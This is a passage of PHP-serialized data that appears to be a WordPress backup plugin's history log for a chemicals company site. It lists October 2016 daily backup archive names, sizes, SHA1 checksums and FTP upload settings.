080561055276231f0cdfd79c070f";s:8:"uploads6";s:40:"aaa89dd6d2c07447b7d60f605092d5a4533ea401";s:8:"uploads8";s:40:"a6543df7f18bb716b3ff0d9229f13b9845e1b649";s:8:"uploads9";s:40:"1347ff58f680ac6e3a5309928b5ebc9fea66c591";s:9:"uploads10";s:40:"16e598c716c9b1f8622aefb47ed0d1de43667e6f";s:9:"uploads11";s:40:"53f2d958ed4c755b19d7de179f2ca840cff037bf";s:7:"others0";s:40:"a38c28a1db9a4875e87bc94837bd970e9085f24b";s:3:"db0";s:40:"dde510d6e0472506c6b290e95aa9f23ce0f5f8b9";}}s:5:"nonce";s:12:"c67d3bb0c55d";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477531317;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-plugins.zip";}s:12:"plugins-size";i:59653820;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:13:{i:0;s:74:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads.zip";i:1;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads2.zip";i:2;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads3.zip";i:3;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads4.zip";i:4;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads5.zip";i:5;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads6.zip";i:6;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads7.zip";i:7;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads8.zip";i:8;s:75:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads9.zip";i:9;s:76:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads10.zip";i:10;s:76:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads11.zip";i:11;s:76:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads12.zip";i:12;s:76:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-uploads13.zip";}s:12:"uploads-size";i:427971844;s:13:"uploads1-size";i:409296305;s:13:"uploads2-size";i:419950399;s:13:"uploads3-size";i:419393049;s:13:"uploads4-size";i:426371077;s:13:"uploads5-size";i:425595624;s:13:"uploads7-size";i:429085573;s:13:"uploads8-size";i:417483747;s:13:"uploads9-size";i:416533976;s:14:"uploads10-size";i:414631231;s:14:"uploads11-size";i:411038436;s:14:"uploads12-size";i:104603842;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-others.zip";}s:11:"others-size";i:1550617;s:2:"db";s:68:"backup_2016-10-27-0121_MillerStephenson_Chemicals_37ea285eeaf8-db.gz";s:7:"db-size";i:1561065;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"85c9a2e7410d0e7d682de510fc050ab7281c719f";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"5d8896f044215a9ec018d4298303b7a9b2650ac8";s:8:"uploads1";s:40:"86aed1cdca5c44163476a43b81245c2aa9d12c2a";s:8:"uploads2";s:40:"90b9e145dca43f285e0737f55374461fb8d15748";s:8:"uploads3";s:40:"014aca6d5665ad690650be9d92b3c6e645ae9024";s:8:"uploads4";s:40:"2d0ba90a02d72171d4c3a3e61054d765cbf353bf";s:8:"uploads5";s:40:"3288a6bcd2c8f4963eacebf85fdccf9a652a86fb";s:8:"uploads7";s:40:"1e02a1d9b1a5aeae3c31cae7c512c8b904427529";s:8:"uploads8";s:40:"a9e6eab7664dc4f8ac8793852849d5f9a9651e56";s:8:"uploads9";s:40:"a4c6b227fd4027b68fcc8044a20e74ada7dc5b63";s:9:"uploads10";s:40:"4431ed5c1eb39a9cb690c514602572ecb9a5e30e";s:9:"uploads11";s:40:"4e8867d31a9540535f221131d54e8d4557a412b6";s:9:"uploads12";s:40:"18dac2321a26ce1c09c8bb1a256235789c7b29ea";s:7:"others0";s:40:"a38c28a1db9a4875e87bc94837bd970e9085f24b";s:3:"db0";s:40:"1bbe4bb2cf484b6b0a011b9446769fdb8d1e2fea";}}s:5:"nonce";s:12:"37ea285eeaf8";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477445318;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-plugins.zip";}s:12:"plugins-size";i:59653820;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads.zip";i:1;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads2.zip";i:2;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads3.zip";i:3;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads4.zip";i:4;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads5.zip";i:5;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads6.zip";i:6;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads7.zip";i:7;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads8.zip";i:8;s:75:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads9.zip";i:9;s:76:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads10.zip";i:10;s:76:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads11.zip";i:11;s:76:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-uploads12.zip";}s:12:"uploads-size";i:410540414;s:13:"uploads1-size";i:416396944;s:13:"uploads2-size";i:430281190;s:13:"uploads3-size";i:406397213;s:13:"uploads4-size";i:389307622;s:13:"uploads5-size";i:372632637;s:13:"uploads6-size";i:440329049;s:13:"uploads7-size";i:412252332;s:13:"uploads8-size";i:416579111;s:13:"uploads9-size";i:419736332;s:14:"uploads10-size";i:425775051;s:14:"uploads11-size";i:137450373;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-others.zip";}s:11:"others-size";i:1550617;s:2:"db";s:68:"backup_2016-10-26-0128_MillerStephenson_Chemicals_743cd16993a0-db.gz";s:7:"db-size";i:1587210;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"85c9a2e7410d0e7d682de510fc050ab7281c719f";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"d64f393948a324819760c8d2800b6a72157d7d9f";s:8:"uploads1";s:40:"6a63e0ed37a3aa3296e76388e0c9fb40c7582129";s:8:"uploads2";s:40:"06da2f81516d48690d3e0962566b8d912f765705";s:8:"uploads3";s:40:"de7bc5c2deff49dea230656c5592eb33ce1502b3";s:8:"uploads4";s:40:"c44ee63aa56821faba38bc42cd58d8fc951f5b16";s:8:"uploads5";s:40:"7e074b66b41fccf75505ee44be1134ca4c23eef1";s:8:"uploads6";s:40:"86a3dedb61876fc67beb4adf26f4c0d3d4762f87";s:8:"uploads7";s:40:"6e93b2e9312ba611e42d5f505b6495a4fed1081d";s:8:"uploads8";s:40:"a74aef6151c14cc8496dfbbe5061cb323a158a53";s:8:"uploads9";s:40:"6582f6caa9a2c761af01eb3de8f227574a518e2a";s:9:"uploads10";s:40:"9f0f80e330370aadcc72a7f413013a61d2b0216b";s:9:"uploads11";s:40:"fdf2d4a00832d8b7a8116e17c91c55c2805559e5";s:7:"others0";s:40:"a38c28a1db9a4875e87bc94837bd970e9085f24b";s:3:"db0";s:40:"e21574b2fc2bd2bc5502e8568ff4bd6748c8d698";}}s:5:"nonce";s:12:"743cd16993a0";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477358529;a:25:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-plugins.zip";}s:12:"plugins-size";i:59653820;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads.zip";i:1;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads2.zip";i:2;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads3.zip";i:3;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads4.zip";i:4;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads5.zip";i:5;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads6.zip";i:6;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads7.zip";i:7;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads8.zip";i:8;s:75:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads9.zip";i:9;s:76:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads10.zip";i:10;s:76:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads11.zip";i:11;s:76:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-uploads12.zip";}s:12:"uploads-size";i:416784777;s:13:"uploads1-size";i:406648642;s:13:"uploads2-size";i:421383773;s:13:"uploads3-size";i:419460399;s:13:"uploads4-size";i:424088208;s:13:"uploads5-size";i:425327438;s:13:"uploads6-size";i:428516572;s:13:"uploads7-size";i:149439959;s:13:"uploads8-size";i:420569429;s:14:"uploads10-size";i:413838756;s:14:"uploads11-size";i:347346141;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-others.zip";}s:11:"others-size";i:1482747;s:2:"db";s:68:"backup_2016-10-25-0122_MillerStephenson_Chemicals_d2507356ce5c-db.gz";s:7:"db-size";i:1489245;s:9:"checksums";a:1:{s:4:"sha1";a:14:{s:8:"plugins0";s:40:"85c9a2e7410d0e7d682de510fc050ab7281c719f";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"213d3ed863769605f4f58be6a51b0665bd22695e";s:8:"uploads1";s:40:"01f9c06d3e770b33001cdc9a8298a5676bf0c66c";s:8:"uploads2";s:40:"0f32ca43eedc5fb787e099f65dc0df77ef7ac14d";s:8:"uploads3";s:40:"735532ccdc2da9032d6d2920363c4647a0220297";s:8:"uploads4";s:40:"609b23192d45961b8fa86a9c5b0476dd6ae22703";s:8:"uploads5";s:40:"88bb3130ef4d98571d0db92e7d92d9553ff98519";s:8:"uploads6";s:40:"07dacf93449328d6e6d1c5158136d31f741b5713";s:8:"uploads8";s:40:"ae8ed4356aafcc097a5c75e398aedea78ff87001";s:9:"uploads10";s:40:"9f96318465320f6b4edd4099150ccb0e17a7b405";s:9:"uploads11";s:40:"bde082df0fe19f1ebdeb68315dbb7c572f417849";s:7:"others0";s:40:"976ed1e59666204f79651972fe28dfb8aefa5744";s:3:"db0";s:40:"205b35a7b119457da9c0e04f95cd57dd967ee18f";}}s:5:"nonce";s:12:"d2507356ce5c";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477273169;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-plugins.zip";}s:12:"plugins-size";i:59653820;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads.zip";i:1;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads2.zip";i:2;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads3.zip";i:3;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads4.zip";i:4;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads5.zip";i:5;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads6.zip";i:6;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads7.zip";i:7;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads8.zip";i:8;s:75:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads9.zip";i:9;s:76:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads10.zip";i:10;s:76:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads11.zip";i:11;s:76:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-uploads12.zip";}s:12:"uploads-size";i:410069386;s:13:"uploads1-size";i:414060147;s:13:"uploads2-size";i:416859777;s:13:"uploads3-size";i:422626451;s:13:"uploads4-size";i:406192810;s:13:"uploads5-size";i:421722976;s:13:"uploads6-size";i:229615170;s:13:"uploads7-size";i:419208904;s:13:"uploads8-size";i:418140868;s:13:"uploads9-size";i:420446390;s:14:"uploads10-size";i:415319201;s:14:"uploads11-size";i:260328736;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-others.zip";}s:11:"others-size";i:1482747;s:2:"db";s:68:"backup_2016-10-24-0139_MillerStephenson_Chemicals_6ec199ab05d2-db.gz";s:7:"db-size";i:1518545;s:9:"checksums";a:1:{s:4:"sha1";a:15:{s:8:"plugins0";s:40:"686d650bba40523b5be74f1739972a09f7c2927d";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"313754bf4a31a330edb1656679223c72d4ffd2a2";s:8:"uploads1";s:40:"b855d4e451306bdadb024448a67a4aeb1f70b0f6";s:8:"uploads2";s:40:"83e5eccf2083164c7a8f964475458bca85203b68";s:8:"uploads3";s:40:"d39913eff37ec3921b8069ec45c521928cb578fc";s:8:"uploads4";s:40:"387e8cae52efc08ab259e1bc87472f925e9965b2";s:8:"uploads5";s:40:"b2f3e4622c0000d97d4464b6d29f1a0db37fd406";s:8:"uploads7";s:40:"59e6a11c6cb91f37d3b6f032a1d3cf196b05014a";s:8:"uploads8";s:40:"6ca4884c3d4986cb618ad3659e2ad671dd743536";s:8:"uploads9";s:40:"7d1561d146bcf954cb7b25d58a529046f136b341";s:9:"uploads10";s:40:"01968b6d759ea48b12cc13eea8044fa1b4ba5f3c";s:9:"uploads11";s:40:"8bb371bfd796ef4508d95b2406cf9402d7f4b376";s:7:"others0";s:40:"976ed1e59666204f79651972fe28dfb8aefa5744";s:3:"db0";s:40:"cbeb5aafe6cb248c0b1870c53e87ad9b97c1365e";}}s:5:"nonce";s:12:"6ec199ab05d2";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477186626;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-plugins.zip";}s:12:"plugins-size";i:59653820;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads.zip";i:1;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads2.zip";i:2;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads3.zip";i:3;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads4.zip";i:4;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads5.zip";i:5;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads6.zip";i:6;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads7.zip";i:7;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads8.zip";i:8;s:75:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads9.zip";i:9;s:76:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads10.zip";i:10;s:76:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads11.zip";i:11;s:76:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-uploads12.zip";}s:12:"uploads-size";i:416784777;s:13:"uploads1-size";i:406648642;s:13:"uploads2-size";i:403855009;s:13:"uploads3-size";i:385776387;s:13:"uploads4-size";i:379701973;s:13:"uploads5-size";i:429403397;s:13:"uploads6-size";i:438390728;s:13:"uploads7-size";i:415713621;s:13:"uploads8-size";i:418444384;s:13:"uploads9-size";i:419736332;s:14:"uploads10-size";i:420263619;s:14:"uploads11-size";i:119869533;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-others.zip";}s:11:"others-size";i:1482747;s:2:"db";s:68:"backup_2016-10-23-0137_MillerStephenson_Chemicals_096901279536-db.gz";s:7:"db-size";i:1434043;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"686d650bba40523b5be74f1739972a09f7c2927d";s:7:"themes0";s:40:"98b188c064a62e2a2bb213e0b5b69c2d5310340e";s:8:"uploads0";s:40:"b44b2b7165bc1f514abb642b4ada73f27dae246d";s:8:"uploads1";s:40:"01f9c06d3e770b33001cdc9a8298a5676bf0c66c";s:8:"uploads2";s:40:"69f67815f38d2ed0aaa83293bf137dd8847fe7a8";s:8:"uploads3";s:40:"6db833da6babb4999b438bcea9a939cbf9b827e2";s:8:"uploads4";s:40:"a178289a5042bfa6e93f28e8db25ec345f668938";s:8:"uploads5";s:40:"f4693187cdc2042e1dd5b66a6d3b02644732fb06";s:8:"uploads6";s:40:"5a33ef98f6e9f15bf22b0045cd0225958636c122";s:8:"uploads7";s:40:"8777cb6b77cc73168a9497d9fb87f2ccf4b42399";s:8:"uploads8";s:40:"7714f1440cb53b129f10968ffd02e4ceb4959578";s:8:"uploads9";s:40:"6582f6caa9a2c761af01eb3de8f227574a518e2a";s:9:"uploads10";s:40:"b3a8489a3d3bd2466ac3f68d190a1588fb997055";s:9:"uploads11";s:40:"cd328a90a9ba22daf572f2b1d8023dd0a5ee8798";s:7:"others0";s:40:"976ed1e59666204f79651972fe28dfb8aefa5744";s:3:"db0";s:40:"066bc12f7142e1f4fa9f5ed9f750b72a22fe9407";}}s:5:"nonce";s:12:"096901279536";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477100653;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-plugins.zip";}s:12:"plugins-size";i:59653820;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads.zip";i:1;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads2.zip";i:2;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads3.zip";i:3;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads4.zip";i:4;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads5.zip";i:5;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads6.zip";i:6;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads7.zip";i:7;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads8.zip";i:8;s:75:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads9.zip";i:9;s:76:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads10.zip";i:10;s:76:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads11.zip";i:11;s:76:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-uploads12.zip";}s:12:"uploads-size";i:410069386;s:13:"uploads1-size";i:413364033;s:13:"uploads2-size";i:415265949;s:13:"uploads3-size";i:419004782;s:13:"uploads4-size";i:430664055;s:13:"uploads5-size";i:373935689;s:13:"uploads6-size";i:439531936;s:13:"uploads7-size";i:415343937;s:13:"uploads8-size";i:415058344;s:13:"uploads9-size";i:417813093;s:14:"uploads10-size";i:398830152;s:14:"uploads11-size";i:105707015;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-others.zip";}s:11:"others-size";i:1482747;s:2:"db";s:68:"backup_2016-10-22-0144_MillerStephenson_Chemicals_8f5525249ab0-db.gz";s:7:"db-size";i:1429239;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"3d152f07eddee3bd4c95544c555fa46a042ac9c4";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"2e2f773597a8419e301e8e2dba678bf8ca9ebec7";s:8:"uploads1";s:40:"156199fc1dc1432d74420eebc04953cae9d12ae7";s:8:"uploads2";s:40:"ac1113615042a3c5084e0263f2abb603b126a3e9";s:8:"uploads3";s:40:"0487b38f7720c7e6f8a51cc9636d39a275f49a87";s:8:"uploads4";s:40:"00fed10258f6f6b943928790a47819943c02dc9b";s:8:"uploads5";s:40:"13b4a49f2c3eafad1c74d4c87a2a1f0ebc565c17";s:8:"uploads6";s:40:"752e3c470d404888e2f02c9bca470e75a35d4f10";s:8:"uploads7";s:40:"90c5881b38faa5bcf1bb77bf4e6c5bad4fc7ca3e";s:8:"uploads8";s:40:"19b4c29a5707caf6d2a297559a15b9f6038fd67c";s:8:"uploads9";s:40:"98bc7fa1ea1a646f631e5e7877f2f7556b9e78c8";s:9:"uploads10";s:40:"c8a5be2a726171c1ab3d5ee9a5a17e50222278f0";s:9:"uploads11";s:40:"86805deaf47cbdf44de9b68d7667e47386abe16f";s:7:"others0";s:40:"976ed1e59666204f79651972fe28dfb8aefa5744";s:3:"db0";s:40:"9670bc76d2bde8c26da4a8a105c01be4c450b758";}}s:5:"nonce";s:12:"8f5525249ab0";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477013942;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-plugins.zip";}s:12:"plugins-size";i:59653820;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads.zip";i:1;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads2.zip";i:2;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads3.zip";i:3;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads4.zip";i:4;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads5.zip";i:5;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads6.zip";i:6;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads7.zip";i:7;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads8.zip";i:8;s:75:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads9.zip";i:9;s:76:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads10.zip";i:10;s:76:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads11.zip";i:11;s:76:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-uploads12.zip";}s:12:"uploads-size";i:427971844;s:13:"uploads1-size";i:409296305;s:13:"uploads2-size";i:419950399;s:13:"uploads3-size";i:406397213;s:13:"uploads4-size";i:389307622;s:13:"uploads5-size";i:372632637;s:13:"uploads6-size";i:440329049;s:13:"uploads7-size";i:412252332;s:13:"uploads8-size";i:416579111;s:13:"uploads9-size";i:419738738;s:14:"uploads10-size";i:420263700;s:14:"uploads11-size";i:119869533;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-others.zip";}s:11:"others-size";i:1482747;s:2:"db";s:68:"backup_2016-10-21-0139_MillerStephenson_Chemicals_bb5dd1151bbc-db.gz";s:7:"db-size";i:1474923;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"69ab321aa24236054f898a9da3248895bdc1fd25";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"eb34dd6b6dedbd838a5aa33dbc8f42f2b555e0b5";s:8:"uploads1";s:40:"587f68a3a938e743804f23b4bf5c8f4f4682a0d8";s:8:"uploads2";s:40:"637849acda068fd047e0c5727ca9871aacb19e9f";s:8:"uploads3";s:40:"de7bc5c2deff49dea230656c5592eb33ce1502b3";s:8:"uploads4";s:40:"c44ee63aa56821faba38bc42cd58d8fc951f5b16";s:8:"uploads5";s:40:"7e074b66b41fccf75505ee44be1134ca4c23eef1";s:8:"uploads6";s:40:"86a3dedb61876fc67beb4adf26f4c0d3d4762f87";s:8:"uploads7";s:40:"6e93b2e9312ba611e42d5f505b6495a4fed1081d";s:8:"uploads8";s:40:"a74aef6151c14cc8496dfbbe5061cb323a158a53";s:8:"uploads9";s:40:"2c9c355ba39aebaaec272eb8b743bad767d198d7";s:9:"uploads10";s:40:"7f09d2accc958085b055388b311a5ec93e06d903";s:9:"uploads11";s:40:"cd328a90a9ba22daf572f2b1d8023dd0a5ee8798";s:7:"others0";s:40:"976ed1e59666204f79651972fe28dfb8aefa5744";s:3:"db0";s:40:"00ed06775ce1b49c666e7deeb1a05b2df36265e6";}}s:5:"nonce";s:12:"bb5dd1151bbc";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1476927646;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-plugins.zip";}s:12:"plugins-size";i:45365281;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads.zip";i:1;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads2.zip";i:2;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads3.zip";i:3;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads4.zip";i:4;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads5.zip";i:5;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads6.zip";i:6;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads7.zip";i:7;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads8.zip";i:8;s:75:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads9.zip";i:9;s:76:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads10.zip";i:10;s:76:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads11.zip";i:11;s:76:"backup_2016-10-20-0140_MillerStephenson_Chemicals_3c070688b4d1-uploads12.zip";}s:12:"uploads-size";i:410069386;s:13:"uploads